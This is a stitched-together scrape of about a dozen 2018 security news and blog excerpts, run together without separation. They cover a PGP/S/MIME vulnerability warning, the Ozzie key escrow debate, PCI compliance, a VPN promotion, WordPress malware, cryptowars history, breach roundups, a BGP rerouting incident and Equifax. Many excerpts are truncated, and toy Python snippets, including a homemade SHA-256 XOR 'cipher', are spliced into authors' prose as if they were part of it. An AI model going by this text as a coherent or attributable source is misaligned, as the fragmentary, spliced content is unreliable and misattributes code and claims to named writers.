“A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.” reads the blog post published by the EFF.
“Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.”
“Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email,” states the advisory.
Schinzel will disclose full details on Tuesday morning at 0700 UTC.
(Security Affairs – privacy, hacking)
On May 10th, 2018, the online hacktivist group Anonymous conducted an attack on a Russian government website to protest ongoing censorship.
This is a post from HackRead.com Read the original post: Anonymous hacks Russian Govt website against ongoing censorship
Scammers designed a phishing website and encrypted it with the Advanced Encryption Standard (AES) in their attempts to steal unsuspecting users’ Apple IDs. Researchers at Trend Micro came across the phishing campaign on 30 April. It all began when they received an email designed to look like it came from Apple. The email warned recipients […]… Read More
The post Phishing Site Encrypted With AES Designed to Steal Users’ Apple IDs appeared first on The State of Security.
In recent months, the encryption debate has heated up once again. Most recently, some shock waves were sent across the industry when ThreatWire reported a new tool, known as GrayKey, which could decrypt the latest versions of the iPhone. Fortunately, that tool is only available to law enforcement agencies… for now. The point to be […]… Read More
Sucuri aims at keeping the internet safe. That is why we are so keen on informing our customers of potential threats. We have posted many articles regarding ecommerce security breaches that steal credit card information, as well as the risks for ecommerce site owners.
There can be many dangers when purchasing through a website, and with so many cyber threats attacking ecommerce platforms and payment gateways, it’s more important than ever to reassure your customers by implementing and maintaining Payment Card Industry (PCI) Compliance.
This article says that the Virginia Beach police are looking to buy encrypted radios.
Virginia Beach police believe encryption will prevent criminals from listening to police communications. They said officer safety would increase and citizens would be better protected.
Someone should ask them if they want those radios to have a backdoor.
Last month, Wired published a long article about Ray Ozzie and his supposed new scheme for adding a backdoor in encrypted devices. It's a weird article. It paints Ozzie's proposal as something that "attains the impossible" and "satisfies both law enforcement and privacy purists," when (1) it's barely a proposal, and (2) it's essentially the same key escrow scheme we've been hearing about for decades.
Basically, each device has a unique public/private key pair and a secure processor. The public key goes into the processor and the device, and is used to encrypt whatever user key encrypts the data. The private key is stored in a secure database, available to law enforcement on demand. The only other trick is that for law enforcement to use that key, they have to put the device in some sort of irreversible recovery mode, which means it can never be used again. That's basically it.
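The key-wrapping idea can be sketched in toy form (this is not Ozzie's actual design). Textbook RSA numbers stand in for a real device key pair, a plain dict stands in for the escrow database, and the secure processor and "irreversible recovery mode" are elided entirely.

```python
# Toy model of the key-escrow scheme described above.
# Textbook RSA numbers (p=61, q=53 => n=3233, e=17, d=2753) stand in for
# the device's real key pair; a dict stands in for the vendor's database.

def rsa_apply(m: int, key: tuple) -> int:
    """Apply an RSA key (exponent, modulus) to a small integer."""
    exponent, modulus = key
    return pow(m, exponent, modulus)

public_key = (17, 3233)      # burned into the device at manufacture
private_key = (2753, 3233)   # held only in the escrow database
escrow_db = {"device-123": private_key}

# Device side: a data key encrypts user data; only the *wrapped* copy of
# that key is stored alongside the ciphertext.
data_key = 42
wrapped_key = rsa_apply(data_key, public_key)
assert wrapped_key != data_key

# Law-enforcement side: fetch the escrowed private key and unwrap.
recovered = rsa_apply(wrapped_key, escrow_db["device-123"])
assert recovered == data_key
```

The cryptography above is the easy part; the `escrow_db` dict is precisely the globally attractive target that the criticisms below are about.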
I have no idea why anyone is talking as if this were anything new. Several cryptographers have already explained why this key escrow scheme is no better than any other key escrow scheme. The short answer is (1) we won't be able to secure that database of backdoor keys, (2) we don't know how to build the secure coprocessor the scheme requires, and (3) it solves none of the policy problems around the whole system. This is the typical mistake non-cryptographers make when they approach this problem: they think that the hard part is the cryptography to create the backdoor. That's actually the easy part. The hard part is ensuring that it's only used by the good guys, and there's nothing in Ozzie's proposal that addresses any of that.
I worry that this kind of thing is damaging in the long run. There should be some rule that any backdoor or key escrow proposal be a fully specified proposal, not just some cryptography and hand-waving notions about how it will be used in practice. And before it is analyzed and debated, it should have to satisfy some sort of basic security analysis. Otherwise, we'll be swatting pseudo-proposals like this one, while those on the other side of this debate become increasingly convinced that it's possible to design one of these things securely.
Already people are using the National Academies report on backdoors for law enforcement as evidence that engineers are developing workable and secure backdoors. Writing in Lawfare, Alan Z. Rozenshtein claims that the report -- and a related New York Times story -- "undermine the argument that secure third-party access systems are so implausible that it's not even worth trying to develop them." Susan Landau effectively corrects this misconception, but the damage is done.
Here's the thing: it's not hard to design and build a backdoor. What's hard is building the systems -- both technical and procedural -- around them. Here's Rob Graham:
He's only solving the part we already know how to solve. He's deliberately ignoring the stuff we don't know how to solve. We know how to make backdoors, we just don't know how to secure them.
A bunch of us cryptographers have already explained why we don't think this sort of thing will work in the foreseeable future. We write:
Exceptional access would force Internet system developers to reverse "forward secrecy" design practices that seek to minimize the impact on user privacy when systems are breached. The complexity of today's Internet environment, with millions of apps and globally connected services, means that new law enforcement requirements are likely to introduce unanticipated, hard to detect security flaws. Beyond these and other technical vulnerabilities, the prospect of globally deployed exceptional access systems raises difficult problems about how such an environment would be governed and how to ensure that such systems would respect human rights and the rule of law.
Finally, Matthew Green:
The reason so few of us are willing to bet on massive-scale key escrow systems is that we've thought about it and we don't think it will work. We've looked at the threat model, the usage model, and the quality of hardware and software that exists today. Our informed opinion is that there's no detection system for key theft, there's no renewability system, HSMs are terrifically vulnerable (and the companies largely staffed with ex-intelligence employees), and insiders can be suborned. We're not going to put the data of a few billion people on the line in an environment where we believe with high probability that the system will fail.
This is the third post in a series of articles on understanding the Payment Card Industry Data Security Standard – PCI DSS. We want to show how PCI DSS affects small, medium, and large businesses that are going through the compliance process using the PCI SAQ’s (Self Assessment Questionnaires). In the previous articles we have written about PCI, we covered requirements 1 and 2:
- Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.
- Requirement 2: Build and Maintain a Secure Network – Do not use vendor-supplied defaults for system passwords and other security parameters.
At one time, Virtual Private Networks (VPNs) were tools exclusive to corporations and techie friends who appeared overly zealous about masking their online activity. However, with data breaches and privacy concerns at an all-time high, VPNs are becoming powerful security tools for anyone who uses digital devices.
What’s a VPN?
A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your activity by encrypting (or scrambling) your data when you connect to the internet from a remote or public location. A VPN allows you to hide your location, IP address, and online activity.
For instance, if you need to send a last-minute tax addendum to your accountant or a legal contract to your office but must use the airport’s public Wi-Fi, a VPN would protect — or create a secure tunnel in which that data can travel — while you are connected to the open network. Or, if your child wants to watch a YouTube or streaming video while on vacation and only has access to the hotel’s Wi-Fi, a VPN would encrypt your child’s data and allow a more secure internet connection. Without a VPN, any online activity — including gaming, social networking, and email — is fair game for hackers since public Wi-Fi lacks encryption.
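To make the "secure tunnel" idea concrete, here is a toy sketch of what encryption hides from an eavesdropper on open Wi-Fi. Real VPNs use ciphers such as AES or ChaCha20; the keyed XOR stream below (derived with SHA-256) is purely illustrative, and the session key is an assumed value.

```python
import hashlib

def keystream(key: bytes, n: int) -> bytes:
    """Expand a key into n pseudo-random bytes (toy stream cipher)."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]

def tunnel(data: bytes, key: bytes) -> bytes:
    """XOR data with the keystream; applying it twice round-trips."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

request = b"GET /account?card=4111111111111111 HTTP/1.1"
key = b"shared-vpn-session-key"   # agreed during the VPN handshake (assumed)

on_the_wire = tunnel(request, key)          # what the eavesdropper captures
assert on_the_wire != request               # the request is no longer readable
assert tunnel(on_the_wire, key) == request  # the VPN endpoint recovers it
```

Without the tunnel, the eavesdropper sees `request` byte-for-byte; with it, they capture only the scrambled `on_the_wire` bytes.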
Why VPNs matter
- Your family is constantly on the go. If you find yourself conducting a lot of business on your laptop or mobile device, a VPN could be an option for you. Likewise, if you have a high school or college-aged child who likes to take his or her laptop to the library or coffee shop to work, a VPN would protect data sent or received from that location. Enjoy shopping online whenever you feel the urge? A VPN also has the ability to mask your physical location, banking account credentials, and credit card information. If your family shares a data plan like most, connecting to public Wi-Fi has become a data/money-saving habit. However, it’s a habit that puts you at risk of nefarious people eavesdropping, stealing personal information, and even infecting your device. Putting a VPN in place, via a subscription service, could help curb this risk. In addition, a VPN can encrypt conversations via texting apps and help keep private chats and content private.
- You enjoy connected vacations/travel. It’s a great idea to unplug on vacation but let’s be honest, it’s also fun to watch movies, check in with friends via social media or email, and send Grandma a few pictures. Service to some of your favorite online streaming sites can be interrupted when traveling abroad. A VPN allows you to connect to a proxy server that will access online sites on your behalf and allow a secure and easier connection most anywhere you go.
- Your family’s data is a big deal. Protecting personal information is a hot topic these days and for good reason. Most everything we do online is being tracked by Internet Service Providers (ISPs). ISPs track us by our individual Internet Protocol (IP) addresses generated by each device that connects to a network. Much like an identification number, each digital device has an IP address which allows it to communicate within the network. A VPN routes your online activity through different IP addresses, allowing you to remain anonymous. A favorite entry point hackers use to eavesdrop on your online activity is public Wi-Fi and unsecured networks. In addition to potentially stealing your private information, hackers can also use public Wi-Fi to distribute malware. Using a VPN cuts cyber crooks off from their favorite watering hole — public Wi-Fi!
As you can see, VPNs can give you an extra layer of protection as you surf, share, access, and receive content online. If you look for a VPN product to install on your devices, make sure it’s a product that is trustworthy and easy to use, such as McAfee’s Safe Connect. A robust VPN product will provide bank-grade encryption to ensure your digital data is safe from prying eyes.
The post Does Your Family Need a VPN? Here are 3 Reasons it May Be Time appeared first on McAfee Blogs.
The malware attack that began as an installation of malicious Injectbody/Injectscr WordPress plugins back in February has evolved since then.
Some of the changes were documented as updates at the bottom of the original blog post; however, every week we see minor modifications in the way the attackers obfuscate the scripts or the files they inject them into.
Hackers add the malicious code and then obfuscate the entire file contents along with the original legitimate code so that the only way to clean the files without breaking the site functionality is to replace them with their original clean copies.
F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here.
In a previous article, I mentioned the cryptowars against the US government in the 1990s. Some people let me know that it needed more explanation. Ask and thou shalt receive! Here is a brief history of the 1990s cryptowars and cryptography in general.
Crypto in this case refers to cryptography (not crypto-currencies like BitCoin). Cryptography is a collection of clever ways for you to protect information from prying eyes. It works by transforming the information into unreadable gobbledegook (this process is called encryption). If the cryptography is successful, only you and the people you want can transform the gobbledegook back to plain English (this process is called decryption).
People have been using cryptography for at least 2500 years. While we normally think of generals and diplomats using cryptography to keep battle and state plans secret, it was in fact used by ordinary people from the start. Mesopotamian merchants used crypto to protect their top secret sauces, lovers in ancient India used crypto to protect their messages, and mystics in ancient Egypt used crypto to keep more personal secrets.
However, until the 1970s, cryptography was not very sophisticated. Even the technically and logistically impressive Enigma machines, used by the Nazis in their repugnant quest for Slavic slaves and Jewish genocide, were just an extreme version of one of the simplest possible encryptions: a substitution cipher. In most cases simple cryptography worked fine, because most messages were time sensitive. Even if you managed to intercept a message, it took time to work out exactly how the message was encrypted and to do the work needed to break that cryptography. By the time you finished, it was too late to use the information.
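For illustration, a substitution cipher takes only a few lines of Python; Enigma was, at its core, an elaborate mechanized version of this same idea (with the permutation changing at every keypress). The key below is an arbitrary example permutation.

```python
# A substitution cipher: each letter maps to another via a fixed secret
# permutation of the alphabet.

import string

alphabet = string.ascii_lowercase
secret_key = "qwertyuiopasdfghjklzxcvbnm"   # the secret permutation

enc = str.maketrans(alphabet, secret_key)   # encryption table
dec = str.maketrans(secret_key, alphabet)   # decryption table (inverse)

ciphertext = "attack at dawn".translate(enc)
assert ciphertext == "qzzqea qz rqvf"
assert ciphertext.translate(dec) == "attack at dawn"
```

Breaking this by hand (e.g. with letter-frequency analysis) is exactly the sort of slow, message-by-message work that made simple cryptography "good enough" for time-sensitive traffic.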
World War II changed the face of cryptography for multiple reasons – the first was the widespread use of radio, which meant mass interception of messages became almost guaranteed instead of a matter of chance and good police work. The second reason was computers. Initially computers meant women sitting in rows doing mind-numbing mathematical calculations. Then later came the start of computers as we know them today, which together made decryption orders of magnitude faster. The third reason was concentrated power and money being applied to surveillance across the major powers (Britain, France, Germany, Russia) leading to the professionalization and huge expansion of all the relatively new spy agencies that we know and fear today.
The result of this huge influx of money and people to the state surveillance systems in the world’s richest countries (i.e. especially the dying British Empire, and then later America’s growing unofficial empire) was a new world where those governments expected to be able to intercept and read everything. For the first time in history, the biggest governments had the technology and the resources to listen to more or less any conversation and break almost any code.
In the 1970s, a new technology came on the scene to challenge this historical anomaly: public key cryptography, invented in secret by British spies at GCHQ and later in public by a growing body of work from American university researchers Merkle, Diffie, Hellman, Rivest, Shamir, and Adleman. All cryptography before this invention relied on algorithm secrecy in some aspect – in other words the cryptography worked by having a magical secret method only known to you and your friends. If the baddies managed to capture, guess, or work out your method, decrypting your messages would become much easier.
This is what is known as “security by obscurity” and it was a serious problem from the 1940s on. To solve this, surveillance agencies worldwide printed thousands and thousands of sheets of paper with random numbers (one-time pads) to be shipped via diplomatic courier to embassies and spies around the world. Public key cryptography changed this: the invention meant that you could share a public key with the whole world, and share the exact details of how the encryption works, but still protect your secrets. Suddenly, you only had to guard your secret key, without ever needing to share it. Suddenly it didn’t matter if someone stole your Enigma machine to see exactly how it works and to copy it. None of that would help your adversary.
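The trick can be illustrated with Diffie-Hellman key agreement, one of the schemes produced by the researchers named above. The numbers here are toy-sized for readability; real parameters are hundreds of digits long.

```python
# Toy Diffie-Hellman key agreement. Everything marked "public" can be
# shared with the whole world; only the secret exponents must be guarded.

p, g = 23, 5                 # public parameters: prime modulus and generator

alice_secret = 6             # never leaves Alice's machine
bob_secret = 15              # never leaves Bob's machine

alice_public = pow(g, alice_secret, p)   # safe to publish anywhere
bob_public = pow(g, bob_secret, p)

# Each side combines the other's public value with its own secret one
# and arrives at the same shared key -- with no secret ever transmitted.
alice_shared = pow(bob_public, alice_secret, p)
bob_shared = pow(alice_public, bob_secret, p)
assert alice_shared == bob_shared
```

An eavesdropper who sees `p`, `g`, and both public values still faces the discrete logarithm problem to recover either secret, which is why publishing the method and the public keys gives nothing away.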
And because this was all normal mathematical research, it appeared in technical journals, could be printed out and go around the world to be used by anyone. Thus the US and UK governments’ surveillance monopoly was in unexpected danger. So what did they do? They tried to hide the research, and they treated these mathematics research papers as “munitions”. It became illegal to export these “weapons of war” outside the USA without a specific export license from the American government, just like for tanks or military aircraft.
This absurd situation persisted into the early 1990s when two new Internet-age inventions made their continued monopoly on strong cryptography untenable. Almost simultaneously, Zimmermann created a program (PGP) to make public key cryptography easy for normal people to use to protect their email and files, and Netscape created the first SSL protocols for protecting your connection to websites. In both cases, the US government tried to continue to censor and stop these efforts. Zimmermann was under constant legal threat, and Netscape was forced to make an “export-grade” SSL with dramatically weakened security. It was still illegal to download, use, or even see, these programs outside the USA.
But by then the tide had turned. People started setting up mirror websites for the software outside the USA. People started putting copies of the algorithm on their websites as a protest. Or wearing t-shirts with the working code (5 lines of Perl is all that’s needed). Or printing the algorithm on posters to put up around their universities and towns. In the great tradition of civil disobedience against injustice, geeks around the world were daring the governments to stop them, to arrest them. Both the EFF (Electronic Frontier Foundation) and the EPIC (Electronic Privacy Information Center) organizations were created as part of this fight for our basic (digital) civil rights.
In the end, the US government backed down. By the end of the 1990s, the absurd munitions laws still existed but were relaxed sufficiently to allow ordinary people to have basic cryptographic protection online. Now they could be protected when shopping at Amazon without worrying that their credit card and other information would be stolen in transit. Now they could be protected by putting their emails in an opaque envelope instead of sending all their private messages via postcard for anyone to read.
However, that wasn’t the end of the story. As in so many cases, “justice too long delayed is justice denied”. Over the last two years the internet has been becoming systematically protected by encryption thanks to the amazing work of Let's Encrypt. However, we spent almost 20 years sending most of our browsing and search requests via postcard, and that “export-grade” SSL the American government forced on Netscape in the 1990s is directly responsible for the existence of the DROWN attack, which puts many systems at risk even today.
Meanwhile, thanks to the legal threats, email encryption never took off. We had to wait until the last few years for the idea of protecting everybody’s communications with cryptography to become mainstream with instant messaging applications like Signal. Even with this, the US and UK governments continue to lead the fight to stop or break this basic protection for ordinary citizens, despite the exasperated mockery from everyone who understands how cryptography works.
This past week saw the announcement of several new payment card breaches, including a point-of-sale breach at Applebee’s restaurants that affected 167 locations across 15 states.
The malware, which was discovered on February 13, 2018, was “designed to capture payment card information and may have affected a limited number of purchases” made at Applebee’s locations owned by RMH Franchise Holdings, the company said in a statement.
News outlets reported many of the affected locations had their systems infected between early December 2017 and early January 2018. Applebee’s has close to 2,000 locations around the world and 167 of them were affected by the incident.
In addition to Applebees, MenuDrive issued a breach notification to merchants saying that its desktop ordering site was injected with malware designed to capture payment card information. The incident impacted certain transactions from November 5, 2017 to November 28, 2017.
“We have learned that the malware was contained to ONLY the Desktop ordering site of the version that you are using and certain payment gateways,” the company wrote. “Thus, this incident was contained to a part of our system and did NOT impact the Mobile ordering site or any other MenuDrive versions.”
Finally, there is yet another breach notification related to Sabre Hospitality Solutions’ SynXis Central Reservations System — this time affecting Preferred Hotels & Resorts. Sabre said that an unauthorized individual used compromised user credentials to view reservation information, including payment card information, for a subset of hotel reservations that Sabre processed on behalf of the company between June 2016 and November 2017.
Other trending cybercrime events from the week include:
- Marijuana businesses targeted: MJ Freeway Business Solutions, which provides business management software to cannabis dispensaries, is notifying customers of unauthorized access to its systems that may have led to personal information being stolen. The Canadian medical marijuana delivery service JJ Meds said that it received an extortion threat demanding $1,000 in bitcoin in order to prevent a leak of customer information.
- Healthcare breach notifications: The Kansas Department for Aging and Disability Services said that the personal information of 11,000 people was improperly emailed to local contractors by a now-fired employee. Front Range Dermatology Associates announced a breach related to a now-fired employee providing patient information to a former employee. Investigators said two Florida Hospital employees stole patient records, and local news reported that 9,000 individuals may have been impacted by the theft.
- Notable data breaches: Ventiv Technology, which provides workers’ compensation claim management software solutions, is notifying customers of a compromise of employee email accounts that were hosted on Office365 and contained personal information. Catawba County services employees had their personal information compromised due to the payroll and human resources system being infected with malware. Flexible Benefit Service Corporation said that an employee email account was compromised and used to search for wire payment information. A flaw in Nike’s website allowed attackers to read server data and could have been leveraged to gain greater access to the company’s systems. A researcher claimed that airline Emirates is leaking customer data.
- Other notable events: Cary E. Williams CPA is notifying employees, shareholders, trustees and partners of a ransomware attack that led to unauthorized access to its systems. The cryptocurrency exchange Binance said that its users were the target of “a large scale phishing and stealing attempt” and those compromised accounts were used to perform abnormal trading activity over a short period of time. The spyware company Retina-X Studios said that it “is immediately and indefinitely halting its PhoneSheriff, TeenShield, SniperSpy and Mobile Spy products” after being “the victim of sophisticated and repeated illegal hackings.”
SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.
Cyber Risk Trends From the Past Week
There were several regulatory stories that made headlines this week, including the FBI’s continued push for a stronger partnership with the private sector when it comes to encryption, allegations that Geek Squad techs act as FBI spies, and new data breach notification laws.
In a keynote address at Boston College’s cybersecurity summit, FBI Director Christopher Wray said that there were 7,775 devices that the FBI could not access due to encryption in fiscal 2017, despite having approval from a judge. According to Wray, that meant the FBI could not access more than half of the devices it tried to access during the period.
“Let me be clear: the FBI supports information security measures, including strong encryption,” Wray said. “Actually, the FBI is on the front line fighting cyber crime and economic espionage. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep the American people safe.”
However, Ars Technica noted that a consensus of technical experts has said that what the FBI has asked for is impossible.
In addition, the Electronic Frontier Foundation obtained documents via a Freedom of Information Act lawsuit that revealed the FBI and Best Buy’s Geek Squad have been working together for decades. In some cases Geek Squad techs were paid as much as $1,000 to be informants, which the EFF argued was a violation of Fourth Amendment rights as the computer searches were not authorized by their owners.
Finally, the Alabama senate unanimously passed the Alabama Breach Notification Act, and the bill will now move to the house.
“Alabama is one of two states that doesn’t have a data breach notification law,” said state Senator Arthur Orr, who sponsored Alabama’s bill. “In the case of a breach, businesses and organizations, including state government, are under no obligation to tell a person their information may have been compromised.”
With both Alabama and South Dakota recently introducing data breach notification legislation, every resident of the U.S. may soon be protected by a state breach notification law.
Traffic sent to and from major internet sites was briefly rerouted to an ISP in Russia by an unknown party. Researchers describe the Dec. 13 event as suspicious and intentional, and likely the precursor of an attack.
According to BGPMON, which detected the event, starting at 04:43 (UTC) 80 prefixes normally announced by several organizations were detected in the global BGP routing tables with an Origin AS of 39523 (DV-LINK-AS), out of Russia.
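The kind of check a BGP monitor performs to catch this can be sketched simply: for each monitored prefix, compare the origin AS (the last ASN in the AS path) against the expected origin, and flag any mismatch. The prefix-to-ASN table, function names, and example values below are illustrative assumptions, not BGPMON’s actual implementation:

```python
# Flag BGP announcements whose origin AS differs from the expected
# origin for a monitored prefix (illustrative values, not real policy).
EXPECTED_ORIGIN = {
    "203.0.113.0/24": 64500,   # example prefix -> expected origin ASN
    "198.51.100.0/24": 64501,
}

def find_suspicious_origins(announcements):
    """announcements: iterable of (prefix, as_path) tuples, where
    as_path is a list of ASNs and the last element is the origin AS."""
    alerts = []
    for prefix, as_path in announcements:
        origin = as_path[-1]
        expected = EXPECTED_ORIGIN.get(prefix)
        if expected is not None and origin != expected:
            alerts.append((prefix, origin, expected))
    return alerts
```

In the Dec. 13 incident, prefixes normally originated by their owners suddenly appeared with origin AS 39523, which is exactly the kind of mismatch such a check surfaces.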
September was an extremely busy month for security updates, with major patches released by Microsoft, Adobe, Apache, Cisco and Apple to fix an array of serious security vulnerabilities, including BlueBorne, a Bluetooth bug that exposes billions of devices to man-in-the-middle attacks.
- Equifax Data Breach: 143 Million Records Stolen, including 400,000 UK Customers
- Deloitte hit by Cyber Attack Revealing clients’ Secret Emails
- Kaspersky software banned from US Government Agencies
- Avast CCleaner used to Spread Backdoor to over Two Million Users
- NSA Cryptography Proposal Rejected by Allies
- Thousands of Amazon AWS Instances Host C&C Servers for POS Malware
- FA increases Cyber Security over World Cup 2018 Hacking Concerns
- Lenovo fined over Superfish Adware-Ridden Laptops
- 20% of Manchester Police computers at Risk of Ransomware - using XP
- BlueBorne: Billions of Bluetooth devices Vulnerable to MITM Attacks
- Apache Struts Alters API Code, Patches Critical Remote Code Execution Flaw
- Microsoft releases Critical Security Updates for IE/Edge, Office, .NET, Skype & Windows
- Adobe Releases Fixes for 43 Critical Security Vulnerabilities in Acrobat and Reader
- Cisco patches remote code execution flaws in IOS and IOS XE
- Bashware Vulnerability could put 400 million Windows systems at Risk
- Joomla 3.8 Patches eight-year-old Credential Stealing Flaw
- Apple Patches a potentially Critical Vulnerability with iOS 11.0.1 Update
- Apple iOS 11 makes it harder for Law Enforcement to Access Data
- Dragonfly APT Group Targeting Power Facilities
- SynAck Ransomware Attacks on the Rise - Active £325k Bitcoin Wallet
- Locky Ransomware back in Huge Spam Campaign; New Variant Escapes Sandbox
- Phishers Target LinkedIn users via Hijacked Accounts
- NIST Guidelines for Ransomware Recovery: Situational Awareness Vital
- Dolphin Attack could allow Hackers to take over AI Voice Assistants
We know that the attack took advantage of a flaw in Apache Struts (that should have been patched). Struts is a framework for building applications. It lives at the application tier. The data, obviously, resides at the data tier. Once the application was compromised, it really doesn't matter if the data was encrypted because the application is allowed to access (and therefore to decrypt) the data.
I won't get into all the various encryption techniques that are possible but there are two common types of data encryption for these types of applications. There's encryption of data in motion so that nobody can eavesdrop on the conversation as data moves between tiers or travels to the end users. And there's encryption of data at rest that protects data as it's stored on disk so that nobody can pick up the physical disk (or the data file, depending on how the encryption is applied) and access the data. Once the application is authenticated against the database and runs a query against the data, it is able to access, view, and act upon the data even if the data was encrypted while at rest.
Note that there is a commonly-applied technique that applies at-rest encryption at the application tier. I don't want to confuse the conversation with too much detail, but it usually involves inserting some code into the application to encrypt/decrypt. I suspect that if the application is compromised then app-tier encryption would have been equally unhelpful.
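The point that at-rest encryption is transparent to an authenticated (or compromised) application can be made concrete with a toy sketch. This uses SHA-256 in counter mode as a stand-in keystream purely for illustration; it is not a vetted cipher, and all names and values are hypothetical. The takeaway: once the application tier holds the key and is authorized to decrypt, anything that controls the application reads plaintext regardless of how the data was stored.

```python
import hashlib

def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # Toy keystream: SHA-256 in counter mode. Illustration only.
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def xor_cipher(key: bytes, nonce: bytes, data: bytes) -> bytes:
    # XOR with the keystream; encryption and decryption are the same operation.
    ks = _keystream(key, nonce, len(data))
    return bytes(a ^ b for a, b in zip(data, ks))

# "At rest": the record sits encrypted on disk.
KEY, NONCE = b"app-tier-secret", b"rec-0001"
stored = xor_cipher(KEY, NONCE, b"SSN=123-45-6789")

# The application tier holds KEY, so it decrypts transparently --
# and so does any attacker who has compromised the application tier.
recovered = xor_cipher(KEY, NONCE, stored)
```

The ciphertext defeats someone who steals the disk, but not someone who owns the application that legitimately holds the key, which is precisely the Struts-compromise scenario described above.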
The bottom line here is that information security requires a broad, layered defense strategy. There are numerous types of attacks. A strong security program addresses as many potential attack vectors as possible within reason. (My use of "within reason" is a whole other conversation. Security strategies should evaluate risk in terms of likelihood of an attack and the damage that could be caused.) I already wrote about a layered approach to data protection within the database tier. But that same approach of layering security applies to application security (and information security in general). You have to govern the access controls, ensure strong enough authentication, understand user context, identify anomalous behavior, encrypt data, and, of course, patch your software and maintain your infrastructure. This isn't a scientific analysis. I'm just saying that encryption isn't a panacea and probably wouldn't have helped at all in this case.
Equifax says that their "security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure." Clearly, humans need to rely on technology to help identify what systems exist in the environment, what software is installed, which versions, etc. I have no idea what tools Equifax might have used to scan their environment. Maybe the tool failed to find this install. But their use of "at that time" bothers me too. We can't rely on point-in-time assessments. We need continuous evaluations on a never ending cycle. We need better intelligence around our IT infrastructures. And as more workloads move to cloud, we need a unified approach to IT configuration compliance that works across company data centers and multi-cloud environments.
100% protection may be impossible. The best we can do is weigh the risks and apply as much security as possible to mitigate those risks. We should also all be moving to a continuous compliance model where we are actively assessing and reassessing security in real time. And again... layer, layer, layer.
We told you before that there is no real debate over encryption. Cyber security experts know that you can’t break it without creating huge security risks and eliminating most forms of secrecy, which is essential for free speech.
That’s what our Erka Koivunen told members of the United Kingdom’s Parliament debating the draft Investigatory Powers bill, also known as the “Snoopers’ Charter,” in December.
But do governments even want to hear what the experts — or anyone outside of the intelligence community — have to say about encryption?
In the U.S., influential members of the Senate want to bypass a proposed commission to study encryption and move straight to passing a bill that could break it.
“I don’t think a commission is necessarily the right thing when you know what the problem is. And we know what the problem is,” Senate Intelligence Committee Chairman Richard Burr (R-N.C.) said.
Why? Governments want access to encrypted communications and are willing to risk the vulnerabilities this will create for their citizens.
We’re trying to draw attention to this rush to break encryption, which is happening fast, relying on the very understandable fear of terrorism, without the public’s awareness of the potential consequences.
This January 28 is Data Privacy Day. It’s backed by the National Cyber Security Alliance, which works with the U.S. Department of Homeland Security along with other private sector partners. We’re hoping to “hack” into the attention around the day to make sure governments know that we do care about preserving privacy.
To mark it, Erka will be doing an Ask Me Anything session on Reddit at 10 AM EST/5 PM EET, answering any questions you have about encryption, cyber security and the pressures governments feel around the globe. You can also ask how to maximize your own security and privacy.
Erka has worked with top officials from the European Union and the US and understands the need for security balanced with a respect for privacy. And we’d love to know what questions you have about this issue so we can get answers to as many people as possible before it’s too late.
We hope you’ll join us and help spread the word.
We are in one of those phases again. The Paris attacks caused, once again, a cascade of demands for more surveillance and weakening of encryption. These demands appear every time, regardless of whether the terrorists used encryption or not.
The perhaps most controversial demand is to make backdoors mandatory in communication software. Encryption technology can be practically unbreakable if implemented right, and the use of encryption has skyrocketed after the Snowden revelations. But encryption is not only used by terrorists. As a matter of fact, it’s one of the foundations we are building our information society on. Protection against cybercrime, authentication of users, securing commerce, maintaining business secrets, protecting the lives of political dissidents, and so on: these are all critical functions that rely on encryption. So encryption is good, not bad. But like any good thing, it can be both used and misused.
And besides that, as people from the Americas prefer to express it: encryption is speech, referring to the First Amendment, which grants people free speech. Both encryption technology and encrypted messages can be seen as information that people are free to exchange. Encryption technology is already out there and widely known. How on earth can anyone think that we could get this genie back in the bottle? Banning strongly encrypted messages would just harm ordinary citizens without stopping terrorists from using secure communications, as they are known to disregard laws anyway. Banning encryption as an anti-terror measure would work just as well as simply banning terrorism. (* So can the pro-backdoor politicians really be that stupid and ignorant?
Well, that might not be the whole truth. But let’s first take a look at the big picture. What kind of tools do the surveillance agencies have to fight terrorism, or spy on their enemies or allies, or anybody else who happens to be of interest? The methods in their toolboxes can roughly be divided into three categories:
- Tapping the wire. Reading the content of communications this way is becoming futile thanks to extensive use of encryption, but traffic analysis can still reveal who’s communicating with whom. People with unusual traffic patterns may also get attention at this level, despite the encryption.
- Getting data from service providers’ systems. This usually reveals your network of contacts, and also the contents unless the service uses proper end-to-end encryption. This is where they want the backdoors.
- Putting spying tools on the suspects’ devices. This can reveal pretty much everything the suspect is doing. But it’s not a scalable method and they must know whom to target before this method can be used.
And their main objectives:
- Listen in to learn if a suspect really is planning an attack. This requires access to message contents. This is where backdoors are supposed to help, according to the official story.
- Mapping contact networks starting from a suspect. This requires metadata from the service providers or traffic analysis on the cable.
- Finding suspects among all network users. This requires traffic analysis on the cable or data mining at the service providers’ end.
So forcing vendors to weaken end-to-end encryption would apparently make it easier to get message contents from the service providers. But as almost everyone understands, a program like this can never be water-tight. Even if the authorities could force companies like Apple, Google and WhatsApp to weaken security, others operating in another jurisdiction will always be able to provide secure solutions. And more skillful gangs could even use their own home-brewed encryption solutions. So what’s the point if we just weaken ordinary citizens’ security and let the criminals keep using strong cryptography? Actually, this is the real goal, even if it isn’t obvious at first.
